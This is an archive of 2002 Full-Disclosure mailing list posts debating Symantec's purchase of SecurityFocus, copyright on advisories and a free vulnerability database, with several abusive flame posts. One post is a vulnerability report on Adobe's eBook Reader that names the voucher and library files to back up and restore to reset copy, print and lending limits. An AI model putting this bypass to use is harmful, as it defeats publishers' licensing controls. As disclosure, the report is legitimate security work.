examples -- just copy'n'paste the "technical bits" of some > of the security bulletins from MS...). 
Have the _only_ PoC code a > compiled binary loaded with copyright notices forbidding reversing, > etc. Be sure to use some "encryption" (extremely trivial is OK as > complexity doesn't matter; can you say XOR?) in the PoC to "protect" > the important secret (generally the overflow "string" itself). Be > capricious in who you prosecute under the DMCA for incoporating > vulnerability detection of this flaw into their products. (Many > other "pro-reversing" laws allow reversing if doing so is the only > (practical) way to ensure compatibility or system inter-operation -- > this should not be a defense against reversing a security > vulnerability exploit...) But how could you stop one from simply setting up a sniffer to "see" what the exploit does on the network or monitor the local system to see what is done? I am all for people releasing exploit code, I see no reason not to, but trying to protect it is a waste of time as there are a million ways, legal ways, around it. From BlueBoar at thievco.com Fri Jul 19 01:52:50 2002 From: BlueBoar at thievco.com (Blue Boar) Date: Thu, 18 Jul 2002 17:52:50 -0700 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... References: <3D372B94.5050905@bokeoa.com> <20020719003830.GA34944@edgemaster.zombie.org> Message-ID: <3D3762E2.1080007@thievco.com> Sean Kelly wrote: > I joined this list to see if it would serve any supplemental value to > Bugtraq and the other security-related resources out there. So far, all I > see is politics and criticism of Symantec and SecurityFocus. Am I mistaken > that this list was intended (and spammed/advertised) to be for full > disclosure security issues? If I am not mistaken, could such politics > related stuff be moved to a different list, as it seems to me that it is > politics and commercialism that you are complaining about in the first > place. > > In other words, can't we just move on with it and stay on topic of the > list? 
Or was this list created to allow people to whine about SecurityFocus > and Symantec? That's what you get with an unmoderated list. People complain about things and send flames. Then they complain about the complaining, and flame people for sending flames. This is the first unmoderated list I've subscribed to in years (out of curiosity.) There's a reason. :) BB From raju at linux-delhi.org Fri Jul 19 02:25:50 2002 From: raju at linux-delhi.org (Raju Mathur) Date: Fri, 19 Jul 2002 06:55:50 +0530 Subject: [Full-Disclosure] List charter Message-ID: <15671.27294.429521.488602@mail.linux-delhi.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Maybe this is the right time for bringing this up. Would the list admins kindly take the time to clarify their position on the potential of this list going commercial at any time? A simple statement like `the archives of this list, subscription to the list and posting privileges to the list shall always remain free for everyone' would do. Preferably PGP-signed. After CDDB, MAPS and ARIS I'm more than a bit concerned about commercialisation of databases created by volunteer contributions. Regards, - -- Raju - -- Raju Mathur raju at kandalaya.org http://kandalaya.org/ It is the mind that moves -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Processed by Mailcrypt 3.5.6 and Gnu Privacy Guard iEYEARECAAYFAj03ao4ACgkQyWjQ78xo0X8oewCfQXbqH5ltFlCA83zMqUkdD04B 5WoAmwRxhPaN5PvL5uyDDH9QHBvS6h7F =MUBu -----END PGP SIGNATURE----- From len at netsys.com Fri Jul 19 02:30:47 2002 From: len at netsys.com (Len Rose) Date: Thu, 18 Jul 2002 21:30:47 -0400 Subject: [Full-Disclosure] maintenance Message-ID: <20020718213047.J14259@netsys.com> We're about to perform some maintenance to the mail server, and will be offline for about an hour. 
Len

From hggdh at attbi.com Fri Jul 19 03:52:22 2002
From: hggdh at attbi.com (HggdH)
Date: Thu, 18 Jul 2002 20:52:22 -0600
Subject: [Full-Disclosure] Copyright Notices
References: <20020719002445.GA23004@www1.grok.org.uk>
Message-ID: <005a01c22ecf$4ee650e0$3264a8c0@local>

Might be a good idea, given what is going on.

I am unsure on the restriction, anyway "(...may not...used for any commercial...). It is obvious all vendors follow BUGTRAQ, vul-watch, etc -- it would be stupid not to. If I am a vendor, and someone posts a vulnerability on my product together with such a restriction, this would put me in a dilemma: if I do not use it, I leave my product vulnerable; if I use it, I will have to pay someone to **allow me to correct my product**.

This sounds even more wrong than Symantec buying BUGTRAQ.

..hggdh..

----- Original Message -----
From: "John Cartwright"
To:
Cc:
Sent: Thursday, July 18, 2002 18:24
Subject: [Full-Disclosure] Copyright Notices

Hi

Some interesting debate about the whole copyright issue going on... We were wondering about appending some kind of statement to posts to back up these points. IANAL, but what do you think of a statement such as this:

"The above post and all elements thereof are copyrighted by the poster, and may not be reproduced or used for any commercial purpose without the express permission of the author, unless specified otherwise."

Obviously by posting you have to agree that
a) Other members might quote what you said in *their* posts.
b) It will all end up in the list archives.

Alternatively we could spell out the situation in the list charter and point to it in the footer to save room.

We'd welcome your comments.

- John

_______________________________________________
Full-Disclosure - We believe in it.
Full-Disclosure at lists.netsys.com http://lists.netsys.com/mailman/listinfo/full-disclosure From full-disclosure at ifokr.org Fri Jul 19 03:57:18 2002 From: full-disclosure at ifokr.org (Brian Hatch) Date: Thu, 18 Jul 2002 19:57:18 -0700 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others. In-Reply-To: <0GZG00C4AZQK0C@smtp2.clear.net.nz> References: <3D375711.3020903@thievco.com> <0GZG00C4AZQK0C@smtp2.clear.net.nz> Message-ID: <20020719025718.GC3913@ifokr.org> > Release exploits with the vaguest of descriptions as to how they work > (lost for examples -- just copy'n'paste the "technical bits" of some > of the security bulletins from MS...). Have the _only_ PoC code a > compiled binary loaded with copyright notices forbidding reversing, > etc. Be sure to use some "encryption" (extremely trivial is OK as > complexity doesn't matter; can you say XOR?) in the PoC to "protect" > the important secret (generally the overflow "string" itself). Be > capricious in who you prosecute under the DMCA for incoporating > vulnerability detection of this flaw into their products. (Many > other "pro-reversing" laws allow reversing if doing so is the only > (practical) way to ensure compatibility or system inter-operation -- > this should not be a defense against reversing a security > vulnerability exploit...) This and other 'Protect your code with the DMCA' ideas are interesting. So we lock down our exploits with crappy encryption, hope someone uses them, and sue. Hopefully we win, and we get a nice check. And the DMCA has just been upheld in court. We establish case law that indicates the DMCA is valid law, that it's even supported by Open Source / Full Disclosure advocates. Next time another Dimitry gets slapped with it, what are we going to fall back on? Although amusing to use the 'tools of the enemy', by using them successfully you strengthen how they can be used against you. I think this is a bad idea... -- Brian Hatch Friends help you move. 
Systems and Real friends help Security Engineer you move bodies. www.buildinglinuxvpns.net Every message PGP signed -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020718/75acb4aa/attachment.bin From len at netsys.com Fri Jul 19 06:52:37 2002 From: len at netsys.com (Len Rose) Date: Fri, 19 Jul 2002 01:52:37 -0400 Subject: [Full-Disclosure] List charter In-Reply-To: <15671.27294.429521.488602@mail.linux-delhi.org>; from raju@linux-delhi.org on Fri, Jul 19, 2002 at 06:55:50AM +0530 References: <15671.27294.429521.488602@mail.linux-delhi.org> Message-ID: <20020719015237.A14267@netsys.com> Hi.. This is as close to an official statement as I can get. We will not make commercial use of this list, or from the contents of this list. We will not promote our services, or misuse this list to further ourselves or any other entity. We will all profit by the knowledge, and intelligence we gather to be used in our research, our jobs, and on our systems and networks. We don't want to repeat the same mistakes, and hopefully with everyone's help, we won't. Raju Mathur wrote: > Maybe this is the right time for bringing this up. > > Would the list admins kindly take the time to clarify their position on > the potential of this list going commercial at any time? A simple > statement like `the archives of this list, subscription to the list > and posting privileges to the list shall always remain free for > everyone' would do. Preferably PGP-signed. > > After CDDB, MAPS and ARIS I'm more than a bit concerned about > commercialisation of databases created by volunteer contributions. > > Regards, > > - -- Raju > - -- -------------- next part -------------- A non-text attachment was scrubbed... 
Name: not available
Type: application/pgp-signature
Size: 185 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020719/74e98ff4/attachment.bin

From vkatalov at elcomsoft.com Fri Jul 19 12:29:50 2002
From: vkatalov at elcomsoft.com (vkatalov at elcomsoft.com)
Date: Fri, 19 Jul 2002 15:29:50 +0400
Subject: [Full-Disclosure] Vulnerability found: Adobe Acrobat eBook Reader and Content Server
Message-ID: <12011592375.20020719152950@elcomsoft.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: MD5

Product Vulnerability Reporting Form

CONTACT INFORMATION
===============================================================================

Name : Vladimir Katalov
E-mail : info at elcomsoft.com
Phone / fax : +7 095 216-7937
              +1 866 448-2703 (fax; US, toll-free)
Affiliation and address: 2-171 generala Antonova st. Moscow 117279 Russia

Have you reported this to the vendor? Yes (the vendor has not replied).

TECHNICAL INFO
===============================================================================

Details on the vulnerability
- ----------------------------

An eBook (electronic book) is simply a file that contains text and images - as in a usual (printed) book, but with additional features such as hyperlinks (cross-references), searching capabilities and sometimes sounds/music. To read an eBook, you should have a PC with appropriate software, or a special hardware device.

Adobe Content Server (http://www.adobe.com/products/contentserver/) makes it easy for you to sell electronic books (eBooks) securely online. Adobe Content Server packages and protects eBooks and distributes them in PDF format directly from any Web site. Anyone with the free Adobe Acrobat eBook Reader (http://www.adobe.com/products/ebookreader/) can purchase your content with ease. That technology allows enabling or disabling the following consumer permissions: copy text to clipboard, print all or a defined number of pages, lending, expiration, and text to speech.

When the file is encrypted, a special master voucher for its distribution is created. The master voucher is a separate, XML-based file that contains an encrypted key to the eBook and the set of privileges that accompany it. When a customer purchases an Adobe PDF eBook directly from an e-commerce site, it's automatically downloaded into the customer's personal Acrobat eBook Reader library for immediate viewing. Acrobat eBook Reader unlocks the encrypted key that came with the eBook and its master voucher. Now the eBook is tied to the customer's Acrobat eBook Reader and can't be transmitted elsewhere unless lending or gifting permission has been enabled.

The voucher also contains permissions (given by the publisher) for all the books: whether or not you can print and copy portions of a book; the publisher may allow you to print only a limited number of pages or to copy a limited number of selections in a given time period. The Acrobat eBook Reader keeps track of your printing and copying. When you print or copy, a dialog box tells you how much printing or copying you have done and asks whether you want to proceed. In addition, if the publisher allows, you can give or lend the book to someone else.

1. Copy/print: if printing and/or copying is allowed, but limited (the typical limitation is: you can print 10 pages in 10 days, or copy 10 portions of the text to the Clipboard in 10 days), these limitations can be defeated. Just create backup copies of the following files from the Adobe Acrobat eBook Reader folder:

   Data\Vouchers\*.*
   Data\GB.dbd
   Data\Category.etb
   Data\Library*.etb
   Data\Library*.vld

After copying or printing in Adobe Acrobat eBook Reader, just restore these files from backup, and copy/print limitations will be back to the status as if you have not copied or printed anything at all.

2. Lend/give: if these operations are allowed by the publisher, you can back up the above mentioned files, perform Lend/Give, and restore the files. The book(s) will remain in your library, while the recipient (you gave the book to) will also have a copy.

The impact of this vulnerability
- --------------------------------

With [1], the owner of the book can copy/print an unlimited number of portions of the book, ignoring the limitations set by the publisher.

With [2], it is possible to create multiple copies (as many as you want) of any book (the 'Give' function is enabled for): make the backup; give it to someone else through network or IR port; restore from backup; give to the next recipient etc.

Systems and/or configurations that are vulnerable
- -------------------------------------------------

All versions of Adobe Content Server, and at least the Windows version of Adobe Acrobat eBook Reader.

Workarounds and/or fixes for this vulnerability
- -----------------------------------------------

Not available. Though it is not very hard to implement a workaround by keeping and validating the checksum or digital signature of the whole vouchers file (not only individual vouchers). For that, however, both Adobe Acrobat eBook Reader and Adobe Content Server should be seriously updated.

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQEVAwUAPTfsT4avf/iY3ldlAQEDtQgAn7NNvstQnqRs761Q0SNIo7SgSEO9V0Gn
oSzuAFyBQHlqpnDBRSpBowKfjcnPOANzXBiaXsJ4ebzRHVxLFatGdg+MCFRujF3d
sUGQf3dM7V1rgNY7sjStsLsraJ0Ku+JSi4Ol4hQH19upmFXki0BnRMPjoGlxumr7
Ii+TSL0F4/Z8zcLtfl6PyAkGc0vKMNrYhWVZp/fc9GMRiI62MU0mZ2utHiuxF7JO
gaQP0q5nFr40WTL1SIVfI4+YnLaErs5Sq4PVsn+7MgcoFGvjI6i8FxVT6Yj7BlWe
BszoBYcm3jNiQ2uay9QhKAMNG+wXsyyJytpS/NeQhnv/MuuRZ+G4qQ==
=Yll/
-----END PGP SIGNATURE-----

From emoyle at scsnet.csc.com Fri Jul 19 14:41:55 2002
From: emoyle at scsnet.csc.com (Ed Moyle)
Date: Fri, 19 Jul 2002 09:41:55 -0400
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.
Message-ID: <3BD76687A1CBD74097E37CB67263AE973559B0@scsetbmail.scsnet.csc.com> On Thursday, July 18, 2002 22:57, Brian Hatch wrote: > This and other 'Protect your code with the DMCA' ideas are interesting. > So we lock down our exploits with crappy encryption, hope someone uses > them, and sue. Hopefully we win, and we get a nice check. > And the DMCA has just been upheld in court. It does make a point about the stupidity of the DMCA, though... Win or lose, there is victory. If you win, somebody stealing your work gets slapped. If you lose, the DMCA is weakened. However, I spent some time thinking about this yesterday, and I've come to the conclusion that I *want* the "good guys" to be able to scan for exploits. If, through my actions, I make it harder for somebody to defend their network or whatever from attack, I don't want that. That's the reason I think most people post vulnerabilities anyway: they want to help the community rather than hurt it. It is just a shame that many companies don't have the same morality, and simultaneously make it harder for the good guys to fight the good fight and make money off of the work that people are freely donating. It is a problem in my opinion. I don't care if I don't get any credit or cash from research; that's not why I do it in the first place. Instead it is about giving back to a community that has given freely to me... -E From fulldisclose at uuuppz.com Fri Jul 19 14:46:02 2002 From: fulldisclose at uuuppz.com (James Martin) Date: Fri, 19 Jul 2002 14:46:02 +0100 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... References: <3D372B94.5050905@bokeoa.com> <20020719003830.GA34944@edgemaster.zombie.org> <3D3762E2.1080007@thievco.com> Message-ID: <005301c22f2a$a0743f20$0aaca5c2@vitalograph.ie> > Release exploits with the vaguest of descriptions as to how they work > (lost for examples -- just copy'n'paste the "technical bits" of some > of the security bulletins from MS...). 
> Have the _only_ PoC code a
> compiled binary loaded with copyright notices forbidding reversing,
> etc. Be sure to use some "encryption" (extremely trivial is OK as
> complexity doesn't matter; can you say XOR?) in the PoC to "protect"
> the important secret (generally the overflow "string" itself). Be

Ummm surely just sniffing the exploit string being sent will reveal the string itself in 99% of cases (remote exploits, that is). Is watching the data a program sends across a network reverse engineering??

Regards

James

From security at ricalo.com Fri Jul 19 14:55:41 2002
From: security at ricalo.com (Georg Reitschmidt)
Date: 19 Jul 2002 15:55:41 +0200
Subject: [Full-Disclosure] List charter
In-Reply-To: <20020719015237.A14267@netsys.com>
References: <15671.27294.429521.488602@mail.linux-delhi.org> <20020719015237.A14267@netsys.com>
Message-ID: <1027086957.1175.1.camel@ricalo>

Hm, why sign a message with gpg when you don't publish the key....

On Fri, 2002-07-19 at 07:52, Len Rose wrote:
> Hi..
>
> This is as close to an official statement as I can get.
>
> We will not make commercial use of this list, or
> from the contents of this list. We will not promote our
> services, or misuse this list to further ourselves or
> any other entity.
>
> We will all profit by the knowledge, and intelligence we
> gather to be used in our research, our jobs, and on our systems
> and networks.
>
> We don't want to repeat the same mistakes, and hopefully with
> everyone's help, we won't.
>
>
> Raju Mathur wrote:
>
> > Maybe this is the right time for bringing this up.
> >
> > Would the list admins kindly take the time to clarify their position on
> > the potential of this list going commercial at any time? A simple
> > statement like `the archives of this list, subscription to the list
> > and posting privileges to the list shall always remain free for
> > everyone' would do. Preferably PGP-signed.
> > > > After CDDB, MAPS and ARIS I'm more than a bit concerned about
> > commercialisation of databases created by volunteer contributions.
> >
> > Regards,
> >
> > - -- Raju
> > - --
>

From weld at vulnwatch.org Fri Jul 19 16:10:26 2002
From: weld at vulnwatch.org (Chris Wysopal)
Date: Fri, 19 Jul 2002 15:10:26 +0000 (GMT)
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
In-Reply-To:
Message-ID:

On Thu, 18 Jul 2002, Jay D. Dyson wrote:

> Perhaps the best way to beat these cash hounds at their own game
> is to start using a strictly not-for-profit licensing on all released
> advisories and proof-of-concept code which stipulates that for-profit
> companies may not use said information in any way.

Even if you put a copyright notice on your advisories and give permission for non-profits to redistribute, the for-profits will just reword the information for their database. It usually takes several days to research and create an advisory and many hours of working with the vendor to get them to fix it. The vuln reporter gets some street cred. The for-profit retypes the information and probably makes a few thousand dollars PER ADVISORY. And several for-profits are doing this.

> Let's face it: the for-profit companies have been leeching off the
> community for years and giving nothing back save for sponsorship of key
> escrow, further draconian legislation, and advocacy of a security cabal
> (which they would control) that would take free information and bundle it
> as a pay-for product/service.

The only way to stop the leeching is to have a free vulnerability database. There could be a site where vuln reporters could enter the information into the database themselves. This database would always be the most up to date and the most accurate. If there was a standardized vuln reporting format perhaps the import to the database could be automated. Mirroring of the database around the world would be encouraged.
I would love VulnWatch to be able to do this. Any volunteers?

> Look, I have nothing against someone trying to make a buck. That
> is the cornerstone of the capitalist system. What burns my biscuits is
> that the monolithic security companies are not making this money off their
> own efforts[1], but by leeching off the egalitarian contributions of those
> who possess a skill set the businesses are not willing to pay for.

Agreed. I have struggled with the model that exists for many years. It
seems the only way to make money off of vuln information is to sell a
database and the people selling them do not pay the vulnerability
reporters for their effort. Let's face it. There would be no security
information business without all the people donating their knowledge for
free.

Of all the vuln database companies SecurityFocus has been the best at
giving back to the community and they say this won't change. Even so a
completely non-corporate and free vuln database would be something good for
the community.

-Chris

> - -Jay
>
> 1. About the only real effort I see from corporate security firms these
> days is whipping up FUD-filled press releases to scare the living
> bejeezus out of the masses about "cyber-terrorism" and other happy
> horseshit.
>
>   (  (                                                         _______
>    ))  ))  .--"There's always time for a good cup of coffee"--.   >====<--.
>  C|~~|C|~~| (>------ Jay D. Dyson -- jdyson at treachery.net ------<) |    =  |-'
>   `--' `--'  `-- I'll be diplomatic...when I run out of ammo. --'  `------'
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Full-Disclosure at lists.netsys.com
> http://lists.netsys.com/mailman/listinfo/full-disclosure
>

From haiku at hushmail.com  Fri Jul 19 19:03:58 2002
From: haiku at hushmail.com (haiku at hushmail.com)
Date: Fri, 19 Jul 2002 11:03:58 -0700
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
Message-ID: <200207191803.g6JI3w141312@mailserver2.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

From the Haiku Hacker for Mr. Wysopal:

Houses
- ----------
Fat Checks Are Good Biz
They buy warm houses for March
Is yours made of glass?

>Even if you put a copyright notice on your advisories and give permission
>for non-profits to redistribute, the for-profits will just reword the
>information for their database. It usually takes several days to research
>and create an advisory and many hours of working with the vendor to get
>them to fix it. The vuln reporter gets some street cred. The for-profit
>retypes the information and probably makes a few thousand dollars PER
>ADVISORY. And several for-profits are doing this.

Or better, thousands per advisory when a consultant for a certain company
shows up to audit networks. What's @stake's billable rate these days?

>The only way to stop the leeching is to have a free vulnerability database.
>There could be a site where vuln reporters could enter the information into
>the database themselves. This database would always be the most up to date
>and the most accurate. If there was a standardized vuln reporting format
>perhaps the import to the database could be automated. Mirroring of the
>database around the world would be encouraged.
>
>I would love VulnWatch to be able to do this. Any volunteers?

I'll not even touch this. I could make fun of several hypocrites on this
list, but like anybody in the industry that actually contributes, I have
a regular job; one that doesn't involve stroking and petting my ego. KTHX.

>Agreed. I have struggled with the model that exists for many years. It
>seems the only way to make money off of vuln information is to sell a
>database and the people selling them do not pay the vulnerability
>reporters for their effort. Let's face it. There would be no security
>information business without all the people donating their knowledge for
>free.
>
>Of all the vuln database companies SecurityFocus has been the best at
>giving back to the community and they say this won't change. Even so a
>completely non-corporate and free vuln database would be something good for
>the community.

Ok. I've been a passive observer on this list since receiving an
unsolicited email from the purveyors. I must admit, this has been one of
the most educational experiences I've had in my time in this industry.
Look at some of the names here: Jay Dyson, Steve Manzuik, Chris Wysopal,
KF, Blue Boar, Len Rose. Notable hackers.

Now, it's time to cut the shit.

First and foremost, let me say this list is complete dogshit. I'd like to
go on the record with my opinion being that moderated mailing lists are a
good thing. It keeps all the fucking whining to a minimum. You think I
actually care that your information is being resold? No! I just want the
information, delivery medium negotiable. I could give a fat rats ass if
you get credit, either. That's one thing I can say for any vulnerability
database; at least I don't have to listen to a bunch of punkasses and
their incessant boohooing; instead, I get just the pertinent information.
At the end of the day, I don't give a fuck who you are, or how great you
think you are; I care that my systems are secure, and that's the bottom
line.

Second, I've been amazed at what big fucking morons the "esteemed hackers"
in the community are. Especially Chris and Jay. Wow! I thought you guys
were really intelligent, and to some extent, had a moderate amount of
respect for you two. The only thing I've seen from any of you at this
point is hidden agenda. You guys are truly disgusting. You guys set the
bar for low.
Proof that nothing is ever what it seems.

Third, I can't believe that not a single one of you dickless, amoebic,
mental-myopics has even BOTHERED to look at the other people in this
"industry" that are regularly exploited, and use the information we supply
for the sake of creating something for the common good. The first person
that comes to mind is Renaud Deraison. Yeah, you guys are fucking
brilliant, right? Make the information copyrighted, so he can't continue
to work on a FREE project continually exploited, and at least try to sell
support so he can pay the fucking rent? Jesus.

And let's not even talk about Marty Roesch. If there's another person that
knows something about giving heart and soul to a project, and continually
getting exploited, he's our man. He runs a great project, and I'll bet not
a single one of you whining bitches hasn't used it, and if you consult,
haven't provided it as a "solution" that you charged some company billable
hours for. So now you want to take the information that he needs as well,
and restrict him from it? Looks to me like he's finally getting his
company off the ground, and you guys want to fuck him now too?

I can't believe the amount of fucking "idealists" we have here that think
they know how to fix the fucking world by fucking the people that actually
do some good in it.

Fuck each and every one of you. I can only hope that one day, you finally
dislodge your head from your ass and realize the ramifications of your
self-serving agenda. I have my doubts about it happening, though.

Furthermore, I'm thankful to see that people like Chris and Jay have
actually come out of the closet to show what fucking miserable,
narcissistic, ugly people they really are. It's high-time that we finally
get an idea of the wheat and chaff in this industry, and separate them.
I still nearly fall off my chair with laughter when I visualize Chris
sucking up to MS, and trying to push the "responsible disclosure" agenda
while moderating an allegedly "full disclosure" list, and posting to
others. You're a man of many faces, Chris, all of them in twos. I'll not
even pick on Jay; I really feel pity on him.

haiku

From hellnbak at nmrc.org  Fri Jul 19 19:54:27 2002
From: hellnbak at nmrc.org (hellNbak)
Date: Fri, 19 Jul 2002 14:54:27 -0400 (EDT)
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
In-Reply-To: <200207191803.g6JI3w141312@mailserver2.hushmail.com>
Message-ID:

> Houses
> - ----------
> Fat Checks Are Good Biz
> They buy warm houses for March
> Is yours made of glass?

OK, so now the idiots who don't have the necessary social skills to get
paying jobs start tossing rocks at those who work for a living. Yeah, fat
checks are a good biz you are damn right, and what is wrong with that? If
you are good at something, go get a job doing that which you are good at.
How can you fault someone for that? Weld Pond has contributed more to the
security industry in general than half the fucks on this list INCLUDING
ME! It is no surprise that his skills are in demand, do you expect him to
flip burgers for a living? I have had my share of run-ins with the guys at
Security Focus but do you think I fault them for getting $75 million? Shit
no, I hope after the VCs are done with them that Al and the crew each put
a million or so in their pocket.
I may not agree with everything SF has done or is going to do but that is
their choice and you can't fault them for making money.

> Or better, thousands per advisory when a consultant for a certain company
> shows up to audit networks. What's @stake's billable rate these days?

The difference here is that the consultant you are talking about in this
case WROTE THE FUCKING ADVISORY. Stop bitching and start contributing. Why
is everyone so against security consultants that have a clue? What's the
matter, your script kiddie tools aren't as effective anymore? Jealous that
you just can't seem to make a big discovery yourself? (heh, I know I am)

What we should be bitching about are the moronic (usually big 5) consulting
companies that have no clue and rely on FUD and commercial products to do
their work for them.

> I'll not even touch this. I could make fun of several hypocrites on this
> list, but like anybody in the industry that actually contributes, I have
> a regular job; one that doesn't involve stroking and petting my ego.

What does wanting to contribute a free vulnerability database have to do
with petting one's ego? This is about keeping the information free and
helping EVERYONE in the industry. Oh yeah, I forgot, this means that people
might actually start patching boxes making your s'kiddiot tools not work.

This in-fighting and finger pointing is complete bullshit gweeds style. Why
not work together for a common good?

> Now, it's time to cut the shit.

I agree.

> First and foremost, let me say this list is complete dogshit. I'd
> like to go on the record with my opinion being that moderated mailing
> lists are a good thing. It keeps all the fucking whining to a minimum.

Again, I agree, moderation prevents abuse. But, moderation also makes
certain people whine that they are being censored.....blah..cry me a river.

> Second, I've been amazed at what big fucking morons the "esteemed hackers"
> in the community are. Especially Chris and Jay.
> Wow!
I thought you guys were really intelligent, and to some extent,
> The only thing I've seen from any of you at this point is hidden agenda.
> You guys are truly disgusting. You guys set the bar for low. Proof
> that nothing is ever what it seems.

Explain what you feel this hidden agenda is? I consider both Jay and Chris
to not only be true hackers but to also be friends. So other than a bit of
common sense what is the hidden agenda?

> And let's not even talk about Marty Roesch. If there's another person
> that knows something about giving heart and soul to a project, and
> continually getting exploited, he's our man. He runs a great project,

If anything, ALL of us should be writing and contributing more Nessus
signatures for stuff.

> Furthermore, I'm thankful to see that people like Chris and Jay have
> actually come out of the closet to show what fucking miserable,
> narcissistic, ugly people they really are. It's high-time that we
> finally get an idea of the wheat and chaff in this industry, and
> separate them. I still nearly fall off my chair with laughter when
> I visualize Chris sucking up to MS, and trying to push the
> "responsible disclosure" agenda while moderating an allegedly
> "full disclosure" list, and posting to others. You're a man of
> many faces, Chris, all of them in twos. I'll not even pick on Jay;
> I really feel pity on him.

Now this is a load of shit. Responsible Full Disclosure means working with
a vendor to get something fixed and then releasing an advisory - NOT
blindsiding a vendor with one day's notice or no notice at all. What is
wrong with Chris, a moderator of VulnWatch, getting involved in the whole
responsible full disclosure thing? I would rather have him involved
because he has a clue than some moron like Russ Cooper or even worse the
MS people alone.

As for VulnWatch -- VulnWatch is full disclosure; a post has never been
rejected based on the status of a vendor.
Yeah, they encourage people to work with vendors but they don't force it.
I KNOW THIS FOR A FACT!

It's time for the so called community to put up or shut up.

--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
"I don't intend to offend, I offend with my intent"
hellNbak at nmrc.org
http://www.nmrc.org/~hellnbak
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

From weld at vulnwatch.org  Fri Jul 19 21:38:21 2002
From: weld at vulnwatch.org (Chris Wysopal)
Date: Fri, 19 Jul 2002 20:38:21 +0000 (GMT)
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
In-Reply-To: <200207191803.g6JI3w141312@mailserver2.hushmail.com>
Message-ID:

On Fri, 19 Jul 2002 haiku at hushmail.com wrote:

> Or better, thousands per advisory when a consultant for a certain
> company shows up to audit networks. What's @stake's billable rate
> these days?

As a consulting company that publishes vulnerability information and
tools, we contribute to the pool that we drink out of.

> First and foremost, let me say this list is complete dogshit. I'd like
> to go on the record with my opinion being that moderated mailing lists
> are a good thing. It keeps all the fucking whining to a minimum. You
> think I actually care that your information is being resold? No! I
> just want the information, delivery medium negotiable. I could give a
> fat rats ass if you get credit, either. That's one thing I can say for
> any vulnerability database; at least I don't have to listen to a bunch
> of punkasses and their incessant boohooing; instead, I get just the
> pertinent information. At the end of the day, I don't give a fuck who
> you are, or how great you think you are; I care that my systems are
> secure, and that's the bottom line.
>

So would you use a non-profit database that was populated by the
vulnerability reporters themselves? That is what I am proposing.

> Second, I've been amazed at what big fucking morons the "esteemed
> hackers" in the community are. Especially Chris and Jay. Wow! I
> thought you guys were really intelligent, and to some extent, had a
> moderate amount of respect for you two. The only thing I've seen from
> any of you at this point is hidden agenda. You guys are truly
> disgusting. You guys set the bar for low. Proof that nothing is ever
> what it seems.

For wanting a public vulnerability database? This is what the security
community is currently missing in a public and open format. There are
open source NIDS, vuln scanners, and other security tools. There are
public security mailing lists. There is a public vuln dictionary, CVE.
But there is no public vuln database. Why is everything else good to have
non-commercial alternatives for except a vuln database? The open source
tools could tie into it.

>
> supply for the sake of creating something for the common good. The
> first person that comes to mind is Renaud Deraison. Yeah, you guys are
> fucking brilliant, right? Make the information copyrighted, so he
> can't continue to work on a FREE project continually exploited, and at
> least try to sell support so he can pay the fucking rent? Jesus.

I certainly didn't mention restricting information. A public
vulnerability database would require the information to be open so that
it could be in the database.

> And let's not even talk about Marty Roesch. If there's another person
> that knows something about giving heart and soul to a project, and
> continually getting exploited, he's our man. He runs a great project,
> and I'll bet not a single one of you whining bitches hasn't used it,
> and if you consult, haven't provided it as a "solution" that you
> charged some company billable hours for. So now you want to take the
> information that he needs as well, and restrict him from it? Looks to
> me like he's finally getting his company off the ground, and you guys
> want to fuck him now too?

@stake employees have contributed to the Snort project. I actually was
using Snort earlier today on a product pen test. It's great.
Marty has created something wonderful. A public vulnerability database
would enhance Snort not hurt it. We don't really do implementation work
but we have recommended to some of our customers that they install Snort.

> separate them. I still nearly fall off my chair with laughter when I
> visualize Chris sucking up to MS, and trying to push the "responsible
> disclosure" agenda while moderating an allegedly "full disclosure"
> list, and posting to others. You're a man of many faces, Chris, all of
> them in twos. I'll not even pick on Jay; I really feel pity on him.

You can support the First Amendment and still limit what you personally
say and write. I choose not to be vulgar in my list postings and I might
even advocate for others to not be vulgar but I would never want to ban
that language.

I think it is a benefit to security if people can patch their boxes before
exploits are written. Nothing is a single bullet solution but I think that
certain disclosure practices can help make this happen. Obviously a lot
has to be done better on the vendor side. So while advocating for people
to follow certain disclosure practices I still don't think there should be
a law restricting free speech. Once someone has chosen to publish
information they are going to publish it. It is better for the community
that VulnWatch approve these messages so that everyone can get the
information at the same time.

-Chris

> haiku
>

From cmeik at gawble.net  Fri Jul 19 21:41:30 2002
From: cmeik at gawble.net (Christopher Meiklejohn)
Date: Fri, 19 Jul 2002 16:41:30 -0400
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
Message-ID:

> > Second, I've been amazed at what big fucking morons the "esteemed
> > hackers" in the community are. Especially Chris and Jay. Wow! I
> > thought you guys were really intelligent, and to some extent, had a
> > moderate amount of respect for you two. The only thing I've seen from
> > any of you at this point is hidden agenda. You guys are truly
> > disgusting. You guys set the bar for low. Proof that nothing is ever
> > what it seems.
>
> For wanting a public vulnerability database? This is what the security
> community is currently missing in a public and open format. There are
> open source NIDS, vuln scanners, and other security tools. There are
> public security mailing lists. There is a public vuln dictionary, CVE.
> But there is no public vuln database. Why is everything else good to
> have non-commercial alternatives for except a vuln database? The open
> source tools could tie into it.

I think that a public vuln database would be incredibly useful. I find
that when security advisories are released, trying to search through all
of the security companies' websites for more information on how it is
